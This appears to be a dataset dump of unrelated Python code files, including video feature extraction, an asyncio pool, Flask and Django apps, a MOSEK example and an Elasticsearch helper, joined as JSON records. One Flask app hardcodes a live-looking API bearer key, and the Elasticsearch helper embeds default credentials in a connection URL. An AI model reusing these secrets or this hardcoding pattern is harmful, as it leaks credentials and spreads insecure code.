feat.size(0) - 1, C, dtype=int)\n feat_dset[i0:i1] = feat.cpu().detach().numpy()[sample_list]\n else:\n feat_dset[i0:i1] = feat.cpu().detach().numpy()\n file_ids_dset[i0:i1] = int(file_id[2:])\n i0 = i1\n\n else:\n clips, valid = extract_clips_with_consecutive_frames(file_path, num_clips=num_clips,\n num_frames_per_clip=16)\n if args.feature_type == 'appearance':\n clip_feat = list()\n if valid:\n for clip_id, clip in enumerate(clips):\n feats = run_batch(clip, model) # (16, 2048)\n feats = feats.squeeze()\n clip_feat.append(feats)\n else:\n clip_feat = np.zeros(shape=(num_clips, 16, 2048))\n clip_feat = np.asarray(clip_feat) # (8, 16, 2048)\n if feat_dset is None:\n C, F, D = clip_feat.shape\n feat_dset = fd.create_dataset('resnet_features', (dataset_size, C, F, D),\n dtype=np.float32)\n file_ids_dset = fd.create_dataset('ids', shape=(dataset_size,), dtype=np.int)\n elif args.feature_type 
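# --- sketch (not part of the record above) ---
# The clip sampling in extract_clips_with_consecutive_frames() above picks evenly
# spaced interior centers with np.linspace and takes half the clip on either side,
# clamping at the video boundaries. The same scheme in isolation, with made-up sizes:
import numpy as np

total_frames, num_clips, frames_per_clip = 100, 8, 16
centers = np.linspace(0, total_frames, num_clips + 2, dtype=np.int32)[1:num_clips + 1]
for c in centers:
    start = max(int(c) - frames_per_clip // 2, 0)
    end = min(int(c) + frames_per_clip // 2, total_frames)
    # a clamped clip is never longer than frames_per_clip; the record pads short ones
    assert 0 < end - start <= frames_per_clip
# --- end sketch ---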
in ['motion', 'hand']:\n clip_torch = torch.FloatTensor(np.asarray(clips)).cuda()\n if valid:\n clip_feat = model(clip_torch) # (8, 2048)\n clip_feat = clip_feat.squeeze()\n clip_feat = clip_feat.detach().cpu().numpy()\n else:\n clip_feat = np.zeros(shape=(num_clips, 2048))\n if feat_dset is None:\n C, D = clip_feat.shape\n feat_dset = fd.create_dataset('resnext_features', (dataset_size, C, D),\n dtype=np.float32)\n file_ids_dset = fd.create_dataset('ids', shape=(dataset_size,), dtype=np.int)\n\n i1 = i0 + 1\n feat_dset[i0:i1] = clip_feat\n file_ids_dset[i0:i1] = int(file_id[2:])\n i0 = i1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu_id', type=int, default=0, help='specify which gpu will be used')\n # dataset info\n parser.add_argument('--dataset', default='CFO', choices=['CFO'], type=str)\n # output\n parser.add_argument('--out', dest='outfile',\n help='output filepath',\n default=\"data/{}/{}_{}_feat.hdf5\", type=str)\n # image sizes\n parser.add_argument('--num_clips', default=8, type=int)\n parser.add_argument('--image_height', default=224, type=int)\n parser.add_argument('--image_width', default=224, type=int)\n\n # network params\n parser.add_argument('--feature_type', default='appearance', choices=['appearance', 'motion', 'hand', 'audio'], type=str)\n parser.add_argument('--seed', default='666', type=int, help='random seed')\n args = parser.parse_args()\n if args.feature_type == 'appearance':\n args.model = 'resnet101'\n elif args.feature_type in ['motion', 'hand']:\n args.model = 'resnext101'\n elif args.feature_type == 'audio':\n args.model = 'VGGish'\n else:\n raise Exception('Feature type not supported!')\n # set gpu\n if args.model != 'resnext101':\n torch.cuda.set_device(args.gpu_id) # use GPU\n torch.manual_seed(args.seed) # set the random seed\n np.random.seed(args.seed)\n\n # annotation files\n if args.dataset == 'CFO':\n args.annotation_file = './data/dataset/CFO/info.json'\n args.dataset_dir = './data/dataset/CFO/'\n video_paths = load_file_paths(args)\n random.shuffle(video_paths)\n # load model\n if args.feature_type == 'appearance':\n model = build_resnet()\n elif args.feature_type in ['motion', 'hand']:\n model = build_resnext()\n elif args.feature_type == 'audio':\n model = torch.hub.load('harritaylor/torchvggish', 'vggish')\n extract_feature(model, video_paths, args.num_clips,\n args.outfile.format(args.dataset, args.dataset, args.feature_type))\n\n","repo_name":"achyun/MRAN","sub_path":"preprocess/extract_feat.py","file_name":"extract_feat.py","file_ext":"py","file_size_in_byte":11253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15462127380","text":"\"\"\"\nAdapted from the code at\n https://github.com/mosquito/aio-pika/blob/master/aio_pika/pool.py\n This project uses aiormq as the underlying library instead of aio_pika;\nonly the logging handle has been removed.\n\"\"\"\nimport asyncio\nfrom typing import Callable, TypeVar, Any\nfrom typing import AsyncContextManager, Coroutine\n\n\nT = TypeVar(\"T\")\nItemType = Coroutine[Any, None, T]\nConstructorType = Callable[..., ItemType]\n\n\nclass Pool(object):\n __slots__ = (\n 'loop', '__max_size', '__items',\n '__constructor', '__created', '__lock',\n '__constructor_args'\n )\n\n def __init__(self, constructor: ConstructorType, *args, max_size: int =\n None, loop: asyncio.AbstractEventLoop = None):\n self.loop = loop or asyncio.get_event_loop()\n self.__max_size = max_size\n self.__items = asyncio.Queue(loop=self.loop)\n self.__constructor = constructor\n self.__constructor_args = args 
or ()\n self.__created = 0\n self.__lock = asyncio.Lock(loop=self.loop)\n\n def acquire(self) -> 'PoolItemContextManager':\n return PoolItemContextManager(self)\n\n @property\n def _has_released(self):\n return self.__items.qsize() > 0\n\n @property\n def _is_overflow(self) -> bool:\n if self.__max_size:\n return self.__created >= self.__max_size or self._has_released\n return self._has_released\n\n async def _create_item(self) -> T:\n async with self.__lock:\n if self._is_overflow:\n return await self.__items.get()\n\n # print('Creating a new instance of %r', self.__constructor)\n item = await self.__constructor(*self.__constructor_args)\n self.__created += 1\n return item\n\n async def _get(self) -> T:\n if self._is_overflow:\n channel = await self.__items.get()\n if channel.is_closed:\n # print('channel is close')\n self.__created -= 1\n channel = await self._create_item()\n # print('new a channel ', channel.is_closed)\n return channel\n\n return await self._create_item()\n\n def put(self, item: T):\n return self.__items.put_nowait(item)\n\n\nclass PoolItemContextManager(AsyncContextManager):\n __slots__ = 'pool', 'item'\n\n def __init__(self, pool: Pool):\n self.pool = pool\n self.item = None\n\n async def __aenter__(self) -> T:\n self.item = await self.pool._get()\n return self.item\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n if self.item is not None:\n self.pool.put(self.item)\n","repo_name":"littlebai3618/bspider","sub_path":"bspider/utils/rabbitMQ/async_client/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4361565214","text":"def max_num(\n a,\n b,\n c,\n):\n if a >= b and a >= c:\n return a\n if c >= b and c >= a:\n return c\n if b >= a and b >= c:\n return b\n\n\nprint(max_num(1, 33, 8))\n","repo_name":"NKATEKO01/Level-0-coding-challenges","sub_path":"question6.py","file_name":"question6.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"126816489","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom urlparse import urlparse\n\nimport mpfs.engine.process\n\nfrom test.common.sharing import CommonSharingMethods\nfrom test.base_suit import set_up_open_url, tear_down_open_url\nfrom mpfs.common.util import from_json\nfrom mpfs.config import settings\nfrom mpfs.core.filesystem.dao.legacy import CollectionRoutedDatabase\n\n\ndb = CollectionRoutedDatabase()\n\n\nclass MediaSharingTestCase(CommonSharingMethods):\n\n def setup_method(self, method):\n super(MediaSharingTestCase, self).setup_method(method)\n self.json_ok('user_init', {'uid': self.uid_1})\n self.json_ok('user_init', {'uid': self.uid_3})\n self.make_dirs()\n\n def test_invite_to_photostream(self):\n self.mail_ok('mksysdir', {'uid' : self.uid, 'type':'photostream'})\n result = self.mail_ok('share_create_group', {'uid': self.uid, 'path': u'/disk/Фотокамера/'})\n for each in result.getchildren():\n if each.tag == 'gid' and each.text and isinstance(each.text, str):\n gid = each.text\n self.assertTrue(gid)\n\n hsh = self.invite_user(path=u'/disk/Фотокамера/', uid=self.uid_3, email=self.email_3)\n args = {'hash': hsh, 'uid' : self.uid_3,}\n folder_info = self.mail_ok('share_activate_invite', args)\n name = folder_info.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера (mpfs-test)')\n\n def test_resolve_photostream_conflicts(self):\n # Create a regular folder named 
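# --- sketch (not part of the records above) ---
# Minimal usage sketch for the Pool class above, assuming it is in scope and a
# pre-3.10 asyncio (the loop= keyword it passes to Queue/Lock was removed later).
# FakeChannel stands in for a real aiormq channel; only is_closed is consulted.
import asyncio

class FakeChannel:
    is_closed = False

async def demo():
    created = []
    async def connect():
        created.append(1)
        return FakeChannel()
    pool = Pool(connect, max_size=2)
    async with pool.acquire() as a:
        async with pool.acquire() as b:
            pass  # two items live at once -> two constructor calls
    async with pool.acquire() as c:
        pass  # a released channel is reused, so no third call
    assert len(created) == 2

asyncio.get_event_loop().run_until_complete(demo())
# --- end sketch ---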
Фотокамера\n self.json_ok('mkdir', {'uid': self.uid, 'path': u'/disk/Фотокамера/'})\n\n # Create a Фотокамера group\n result = self.mail_ok('share_create_group', {'uid' : self.uid, 'path': u'/disk/Фотокамера/'})\n for each in result.getchildren():\n if each.tag == 'gid' and each.text and isinstance(each.text, str):\n gid = each.text\n self.assertTrue(gid)\n\n # Send the invite and check that the accepted folder is named Фотокамера\n hsh = self.invite_user(uid=self.uid_3, path=u'/disk/Фотокамера/', rights='640')\n args = {'hash': hsh, 'uid': self.uid_3}\n folder_info = self.mail_ok('share_activate_invite', args)\n name = folder_info.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера')\n\n # Create the invitee's special photostream folder\n self.mail_ok('mksysdir', {'uid': self.uid_3, 'type': 'photostream'})\n\n # Verify\n result = self.mail_ok('info', {'uid': self.uid_3, 'path': u'/disk/Фотокамера/'})\n name = result.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера')\n\n result = self.mail_ok('info', {'uid': self.uid_3, 'path': u'/disk/Фотокамера 1/'})\n name = result.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера 1')\n\n owner = result.find('folder').find('meta').find('group').find('owner').find('login')\n self.assertEqual(owner.text, u'mpfs-test')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/test/parallelly/sharing/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29145121635","text":"from flask import Flask\nfrom flask import render_template\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__)\n# We need to define our Model, which is the Python version of our SQL table.\n# Every table gets a model, and we use that model to play around with its associated table from Python.\n\n# First off, you tell the app where to find the database and initialize SQLAlchemy:\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///schools.sqlite3'\ndb = SQLAlchemy(app)\n# Let SQLAlchemy infer the data type of each column by looking at the existing columns, this is called reflecting\ndb.Model.metadata.reflect(db.engine)\n\n'''\nTo create the model, we need to tell the model four things\n1. Its name, here \"School\", because it's a list of schools\n2. The table name to both find the data and to learn the columns from. That’s schools-geocoded, because TablePlus took the name right from the CSV file and did not give us any other choice.\n3. A weird line about \"extend_existing\" which is always exactly the same\n4. Even though SQLAlchemy learns the columns by reflecting, it needs a unique column to be able to keep each row separate, like an id. In this case, it’s the LOC_CODE column. 
This is called the “primary key.”\n'''\nclass School(db.Model):\n __tablename__ = 'schools-geocoded'\n __table_args__ = {'extend_existing': True}\n LOC_CODE = db.Column(db.Text, primary_key=True)\n\n@app.route(\"/\")\ndef index():\n\n # School.query.count() uses our model - School - to visit the database, build a new query, and count the number of rows in the table.\n print(\"Total number of schools is\", School.query.count())\n # school_count = f\"{School.query.count():,}\"\n school_count = School.query.count()\n\n # Make a query to our School model to filter for a specific data point\n # What comes back from the database is that one row where LOC_CODE='X270' - we only got one because we asked for .first().\n # You can just ask for each column with a period.\n school = School.query.filter_by(LOC_CODE='X270').first()\n print(\"School's name is\", school.SCHOOLNAME)\n\n # If we want to get fancier, we can also select multiple rows with .all()\n # Since we asked for .all() what comes back is similar to a list.\n # Remember that SQLAlchemy is not like pandas, and you only get to use one item at a time!\n schools = School.query.all()\n\n # When you use print in the Flask app, it does not print to the web page. That’s the render_template part.\n # Instead, print prints to the command line. It’s totally useless for showing things to the user, but a nice cheat to check things and help us debug.\n return render_template(\"list.html\", count=school_count, schools=schools, location=\"New York City\")\n\n@app.route('/city')\ndef city_list():\n # Get the unique city values from the database\n cities = School.query.with_entities(School.city).distinct().all()\n # They're in a weird list of one-element lists, though, like\n # [['Yonkers'],['Brooklyn'],['Manhattan']]\n # so we'll take them out of that\n cities = [city[0].title() for city in cities]\n # Now that they're both \"New York,\" we can now dedupe and sort\n cities = sorted(list(set(cities)))\n return render_template(\"cities.html\", cities=cities)\n\n@app.route('/schools/<slug>')\ndef detail(slug):\n school = School.query.filter_by(LOC_CODE=slug).first()\n return render_template(\"detail.html\", school=school)\n\n@app.route('/city/<cityname>')\ndef city(cityname):\n cityname = cityname.replace(\"-\", \" \")\n schools = School.query.filter_by(city=cityname.upper()).all()\n return render_template(\"list.html\", schools=schools, count=len(schools), location=cityname)\n\n@app.route('/zip/<zipcode>')\ndef zip(zipcode):\n schools = School.query.filter_by(ZIP=zipcode).all()\n return render_template(\"list.html\", schools=schools, count=len(schools), location=zipcode)\n\nif __name__ == \"__main__\":\n\n app.run(debug=True)","repo_name":"kdmayer/flask_tutorial","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21942444892","text":"from pathlib import Path\nfrom struct import unpack, calcsize\nimport click\nfrom tqdm import tqdm\nimport math\nimport numpy as np\n\n\nclass Trace:\n def __init__(self, filename):\n # [version] [size] [requests] [unique] [data]\n # 1 x x z index\n # 2 file size count unique (i, s)\n self.filename = filename\n with filename.open('rb') as f:\n self.version, self.size, self.requests, self.unique = unpack('qqqq', f.read(8 * 4))\n if self.version not in (1, 2):\n raise RuntimeError(f\"Unknown trace version {self.version}\")\n\n def __iter__(self):\n with self.filename.open('rb') as f:\n 
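# --- sketch (not part of the records above) ---
# The School model above leans on db.Model.metadata.reflect() so only the primary
# key is declared by hand. A self-contained sketch of the same reflect pattern with
# plain SQLAlchemy and an in-memory database; the table and columns are made up here.
import sqlalchemy as sa

engine = sa.create_engine('sqlite://')
with engine.begin() as conn:
    conn.execute(sa.text('CREATE TABLE schools (loc_code TEXT PRIMARY KEY, name TEXT)'))

metadata = sa.MetaData()
metadata.reflect(bind=engine)  # column definitions are learned from the live table
assert 'name' in metadata.tables['schools'].c
# --- end sketch ---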
f.read(8 * 4)\n if self.version == 1:\n for _ in range(self.size):\n yield unpack('q', f.read(8))[0]\n elif self.version == 2:\n for _ in range(self.size):\n start, count = unpack('qq', f.read(8 * 2))\n yield from range(start, start + count)\n\n\n@click.group()\ndef commands():\n pass\n\n\n@commands.command(name='list', help='List all traces in a folder and their size')\n@click.argument('path')\ndef list_all(path):\n p = Path(path)\n\n for filename in p.glob('*.blis'):\n trace = Trace(filename)\n print(f'{str(trace.filename.name):<19} version = {trace.version} '\n f'size = {trace.size:>8} '\n f'requests/unique = {trace.requests:>8}/{trace.unique:>8} '\n f'[{trace.requests / trace.unique:.3f}]')\n\n\n@commands.command(help='Get info about single trace')\n@click.option('--latex/--no-latex', default=False)\n@click.argument('filename')\ndef stat(filename, latex):\n trace = Trace(Path(filename))\n n = trace.requests - trace.unique\n\n last_seen = {}\n distances = []\n for i, req in tqdm(enumerate(iter(trace)), desc=\"Loading data\",\n total=trace.requests, leave=False, miniters=100000):\n d = i - last_seen.get(req, i)\n if d != 0:\n distances.append(d)\n last_seen[req] = i\n\n distances = np.array(distances)\n mean = np.mean(distances)\n stddev = distances.std()\n median = int(np.median(distances))\n\n if latex:\n print(f'{trace.filename.name:<7} & {trace.requests:>8} & {trace.unique:>8} & '\n f'{trace.requests/trace.unique:>5.2f} & {median:>7} & '\n f'{mean:>7.0f} & {stddev:>7.0f} & {stddev/mean:>4.2f} \\\\\\\\')\n else:\n print(f'{trace.filename.name}')\n print(f'Requests/Targets: {trace.requests}/{trace.unique} '\n f'[{trace.requests / trace.unique:.2f} R/T]')\n print(f'Median distance: {median}')\n print(f'Mean distance: {mean:.0f} ± {stddev:.0f} [RSD {stddev / mean:.2f}]')\n\n\nif __name__ == '__main__':\n commands()\n","repo_name":"metopa/lru_benchmark","sub_path":"traces/trace_info.py","file_name":"trace_info.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"4014805301","text":"Import(\"src_env\")\nrewofs_env = src_env.Clone()\n\nMAIN = \"main.cpp\"\nSRC = Glob(\"*.cpp\", exclude=MAIN) + Glob(\"client/*.cpp\") + Glob(\"server/*.cpp\")\n\nrewofs_env.Flatc(\n Glob(\"messages/*.fbs\"),\n FLATC_OUTDIR=Dir(\"messages\").abspath,\n FLATC_FLAGS=[\n \"--cpp\",\n \"--scoped-enums\",\n \"--gen-mutable\",\n \"--gen-object-api\",\n \"--gen-name-strings\",\n \"--reflect-types\",\n \"--reflect-names\",\n ],\n FLATC_INCPATH=[\"#src\"],\n )\n\nOUT = \"rewofs\"\n\nrewofs_lib = [\n src_env.WholeArchive(rewofs_env.StaticLibrary(OUT, SRC)),\n \"fuse3\", \"nanomsg\", \"anl\", \"fmt\", \"zstd\",\n \"boost_program_options\", \"boost_filesystem\", \"boost_system\",\n \"inotifytools\",\n ]\n\nrewofs_env.AppendUnique(LIBS=[rewofs_lib])\n\nrewofs_prog = rewofs_env.Program(OUT, [MAIN])[0]\n\nExport(\"rewofs_lib\", \"rewofs_prog\")\n","repo_name":"dsiroky/rewofs","sub_path":"src/rewofs/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10543408400","text":"from __future__ import print_function\nimport codecs\nimport pickle\nimport os\nimport sys\nimport marisa_trie\n\nfrom nksnd.utils import words\nfrom nksnd.dictionaries import marisa_dict\nfrom nksnd.graph import graph, viterbi\nfrom nksnd.slm import slm\nfrom nksnd.config import lmconfig, slm_config\n\ndef concat(files):\n for 
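# --- sketch (not part of the records above) ---
# The on-disk layout the Trace class above decodes: a header of four int64s
# (version, size, requests, unique) followed, for version 2, by (start, count) runs.
# Treating 'size' as the number of runs is inferred from the reader loop, and the
# sketch assumes the Trace class above is in scope.
from pathlib import Path
from struct import pack

def write_v2_trace(path, runs):
    requests = sum(count for _, count in runs)
    unique = len({i for start, count in runs for i in range(start, start + count)})
    with Path(path).open('wb') as f:
        f.write(pack('qqqq', 2, len(runs), requests, unique))  # header
        for start, count in runs:
            f.write(pack('qq', start, count))  # one run per record

write_v2_trace('demo.blis', [(0, 4), (2, 3)])
assert list(Trace(Path('demo.blis'))) == [0, 1, 2, 3, 2, 3, 4]
Path('demo.blis').unlink()
# --- end sketch ---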
file in files:\n for line in file:\n yield line.strip('\\n')\n\ndef count_words_and_lines(sentences):\n counts = {}\n lines_num = 0\n for sentence in sentences:\n lines_num += 1\n for word in sentence:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n return counts, lines_num\n\ndef cut_off_set(counts, cut_off):\n return marisa_trie.Trie((x for x in counts.keys() if counts[x] > cut_off))\n\ndef pronounciation(sentence):\n pronoun = u\"\"\n for word in sentence:\n s, p = words.surface_pronoun(word)\n pronoun = pronoun + p\n return pronoun\n\nclass LM:\n\n def __init__(self):\n pass\n\n def train(self, file_names):\n print(\"Counting words...\")\n files = [codecs.open(fname, encoding='utf-8') for fname in file_names]\n lines = concat(files)\n sentences = (line.split(' ') for line in lines)\n counts, lines_num = count_words_and_lines(sentences)\n self.known_words = cut_off_set(counts, lmconfig.unknownword_threshold)\n for f in files:\n f.close()\n\n print(\"Building statistical model...\")\n files = [codecs.open(fname, encoding='utf-8') for fname in file_names]\n lines = concat(files)\n sentences = (line.split(' ') for line in lines)\n self.slm = slm.SLM()\n self.slm.fit(sentences)\n for f in files:\n f.close()\n\n print(\"training end.\")\n\n def score(self, words):\n words = [u'_BOS'] + words + [u'_EOS']\n score = 0\n for i in range(len(words) - 1):\n score += self.slm.get_bigram_weight(words[i], words[i+1])\n return score\n\n def n_candidates(self, pronoun, n):\n gr = graph.Graph(self.slm, pronoun)\n viterbi.forward_dp(self.slm, gr)\n paths = viterbi.backward_a_star(self.slm, gr, n)\n return paths\n\n def convert(self, pronoun):\n return self.n_candidates(pronoun, 1)[0]\n\n def next_candidates(self, words, pronoun, num):\n candidates = self.slm.get_from_pronoun(pronoun)\n if len(words) > 0:\n candidates_with_weight = [(word, self.slm.get_bigram_weight(words[-1], word)) for word in candidates]\n else:\n candidates_with_weight = [(word, self.slm.get_unigram_weight(word)) for word in candidates]\n sorted_tuples = sorted(candidates_with_weight, key=lambda t: - t[1])\n sorted_candidates = list(map(lambda t: t[0], sorted_tuples))\n if num > 0:\n return sorted_candidates[:num]\n else:\n return sorted_candidates\n\n def save(self, path):\n\n print(\"Saving the language model...\", file=sys.stderr)\n marisa_known_words = marisa_trie.Trie(self.known_words)\n marisa_known_words.save(os.path.join(path, 'known_words'))\n self.slm.save(path)\n print(\"end.\", file=sys.stderr)\n\n def load(self, path):\n self.slm = slm.SLM()\n self.slm.mmap(path)\n self.known_words = marisa_trie.Trie().mmap(os.path.join(path, 'known_words'))\n","repo_name":"yoriyuki/nksnd","sub_path":"nksnd/lm/lm.py","file_name":"lm.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"} +{"seq_id":"19834773487","text":"import mosek\nimport sys\nimport time\n\ndef streamprinter(msg):\n sys.stdout.write(msg)\n sys.stdout.flush()\n\nif len(sys.argv) != 5:\n print(\"Missing argument, syntax is:\")\n print(\" opt-server-async inputfile host port numpolls\")\nelse:\n\n filename = sys.argv[1]\n host = sys.argv[2]\n port = sys.argv[3]\n numpolls = int(sys.argv[4])\n token = None\n\n with mosek.Env() as env:\n\n with env.Task(0, 0) as task:\n\n print(\"reading task from file\")\n task.readdata(filename)\n\n print(\"Solve the problem remotely (async)\")\n token = task.asyncoptimize(host, port)\n\n print(\"Task token: %s\" % 
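# --- sketch (not part of the records above) ---
# cut_off_set() above drops rare words and packs the survivors into a marisa-trie
# for compact membership tests. The same cut in miniature, assuming the marisa_trie
# package is installed; counts are made up.
import marisa_trie

counts = {u'the': 40, u'of': 25, u'hapax': 1}
kept = marisa_trie.Trie(w for w in counts if counts[w] > 1)
assert u'the' in kept and u'hapax' not in kept
# --- end sketch ---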
token)\n\n with env.Task(0, 0) as task:\n\n task.readdata(filename)\n\n task.set_Stream(mosek.streamtype.log, streamprinter)\n\n i = 0\n\n while i < numpolls:\n\n time.sleep(0.1)\n\n print(\"poll %d...\" % i)\n respavailable, res, trm = task.asyncpoll(host,\n port,\n token)\n\n print(\"done!\")\n\n if respavailable:\n print(\"solution available!\")\n\n respavailable, res, trm = task.asyncgetresult(host,\n port,\n token)\n\n task.solutionsummary(mosek.streamtype.log)\n break\n\n i = i + 1\n\n if i == numpolls:\n print(\"max number of polls reached, stopping host.\")\n task.asyncstop(host, port, token)","repo_name":"OxDuke/Bilevel-Planner","sub_path":"third_party/mosek/9.0/tools/examples/python/opt_server_async.py","file_name":"opt_server_async.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"16243370541","text":"from django.shortcuts import render\nfrom .models import Destination\n# Create your views here.\n\ndef index(request):\n dest1 = Destination()\n dest1.place = \"India\"\n dest1.city = \"chennai - Marina beach\"\n dest1.price = 999\n dest1.offer = True\n\n\n dest2 = Destination()\n dest2.place = \"America\"\n dest2.city = \"New york\"\n dest2.price = 1999\n dest2.offer = False\n\n dest3 = Destination()\n dest3.place = \"Japan\"\n dest3.city = \"Tokyo\"\n dest3.price = 1500\n dest3.offer = True\n\n dests = [dest1,dest2,dest3]\n\n\n\n return render(request,'index.html',{'dests':dests})\n\n","repo_name":"viswasarathi/Django_learn","sub_path":"travello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33070307858","text":"from flask import Flask, render_template, request\r\nimport requests\r\n\r\napp = Flask(__name__,template_folder=\"C:/Users/gujar/Downloads/WorqTroika-main/WorqTroika-main/templates\")\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/generate_notes', methods=['POST'])\r\ndef generate_notes():\r\n question = request.form.get('question')\r\n\r\n # Make a request to the Worqhat API\r\n url = \"https://api.worqhat.com/api/ai/content/v2\"\r\n headers = {\r\n \"Authorization\": \"Bearer sk-cb66f6d3f4b34978a7714eb9a6651f21\",\r\n \"Content-Type\": \"application/json\"\r\n }\r\n data = {\r\n \"question\": question,\r\n \"randomness\": 0.4\r\n }\r\n response = requests.post(url, headers=headers, json=data)\r\n\r\n if response.status_code == 200:\r\n try:\r\n notes = response.json()['content']\r\n return render_template('notes.html', notes=notes)\r\n except KeyError:\r\n return \"Error: Response format is unexpected\"\r\n else:\r\n return \"Error: Unable to generate notes\"\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True,port=5001)\r\n","repo_name":"Sohamgujar71/TechTroika_WorqHat","sub_path":"textgen.py","file_name":"textgen.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13419774467","text":"import smtplib\n\nimport shareds\nimport logging\nimport traceback\n\nfrom flask_mail import Mail, Message\nfrom models import syslog\n#from builtins import False\n\ndef get_sysname():\n sysname = shareds.app.config.get(\"STK_SYSNAME\")\n return sysname\n\ndef email(mail_from,mail_to,reply_to,subject,body):\n try:\n mail = Mail()\n sysname = get_sysname()\n msg = 
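# --- sketch (not part of the records above) ---
# The opt_server_async example above sleeps, polls, and gives up after a fixed
# number of attempts. The same bounded-polling shape in isolation, with check()
# as a stand-in for task.asyncpoll.
import time

def poll_until(check, attempts, delay=0.01):
    for i in range(attempts):
        time.sleep(delay)
        done, result = check(i)
        if done:
            return result
    return None  # caller decides what to do when polling is exhausted

assert poll_until(lambda i: (i == 2, 'solved'), attempts=5) == 'solved'
assert poll_until(lambda i: (False, None), attempts=3) is None
# --- end sketch ---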
Message(f\"{sysname.title()}: {subject}\",\n body=body,\n sender=mail_from,\n reply_to=reply_to,\n recipients=[mail_to])\n mail.send(msg)\n return True\n except Exception as e:\n logging.error(\"iError in sending email\")\n logging.error(str(e))\n traceback.print_exc()\n return False\n\ndef email_admin(subject,body,sender=None): # send email to admin\n # must use isotammi.net domain for the sender (Sender Policy Framework)\n admin = shareds.app.config.get('ADMIN_EMAIL_FROM')\n \n mail_to = shareds.app.config.get('ADMIN_EMAIL_TO')\n \n # put the original sender in the 'reply to' address\n if sender is None:\n reply_to = mail_to\n else:\n reply_to = sender\n if admin and mail_to and reply_to:\n if email(admin,mail_to,reply_to,subject,body):\n syslog.log(type=\"sent email to admin\", sender=sender,receiver=mail_to,reply_to=reply_to,subject=subject)\n return True\n else: \n syslog.log(type=\"FAILED: email to admin\", sender=sender,receiver=mail_to,reply_to=reply_to,subject=subject)\n return False\n return False\n \ndef email_from_admin(subject,body,receiver):\n sender = shareds.app.config.get('ADMIN_EMAIL_FROM')\n reply_to = shareds.app.config.get('ADMIN_EMAIL_TO')\n if sender and reply_to:\n syslog.log(type=\"sent email from admin\",sender=sender,receiver=receiver,reply_to=reply_to,subject=subject) \n return email(sender,receiver,reply_to,subject,body) \n","repo_name":"Taapeli/stk-upload","sub_path":"app/models/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"73467056872","text":"import logging\nfrom elasticsearch_dsl import Search\nfrom elasticsearch_dsl.connections import connections\n\nfrom lawgokr.settings import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT\nfrom lawgokr.exceptions import ElasticSearchError\n\nclass Counter:\n def __init__(self, total_cases, saved_cases):\n self.total_cases = total_cases\n self.saved_cases = saved_cases\n\n\ndef logger(message):\n logging.warning(message)\n with open('../output.log', 'a') as file:\n file.write(message + '\\n')\n\n\n# es = Elasticsearch(\n# [\n# 'http://user:secret@localhost:9200/',\n# 'https://user:secret@other_host:443/production'\n# ],\n# verify_certs=True\n# )\n\n\ndef create_connection():\n try:\n # connections.create_connection(hosts=[f'{ELASTICSEARCH_HOST}:{ELASTICSEARCH_PORT}'])\n connections.create_connection(hosts=[ 'http://elastic:changeme@localhost:9200/' ])\n except Exception as e:\n logger(str(e))\n raise ElasticSearchError('Elasticsearch Connection Error')\n\n\ndef is_unique(model):\n response = Search(index=\"law_go_kr\") \\\n .query(\"match\", case_id=model.case_id).execute()\n return False if response else True\n\n\ndef db_cases_count():\n s = Search(index='law_go_kr')\n s.from_dict({\"query\": {\"wildcard\": {\"case_id\": \"*\"}}})\n return s.count()\n","repo_name":"ganadara135/law2","sub_path":"lawgokr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12600903502","text":"def main():\n uniquedict = dict();\n in_file = open(\"tale_of_two_cities.txt\",\"r\")\n allwords=open(\"allwords.txt\",\"w\")\n \n unique=open(\"a3_novelvisualization/uniquewords.txt\",\"w\")\n \n freq=open(\"a3_wordfrequency/wordfrequency.txt\",\"w\")\n for line in in_file:\n wordlist=line.split()\n for word in wordlist:\n word=word.lower()\n writeword=''\n for character in word:\n if 
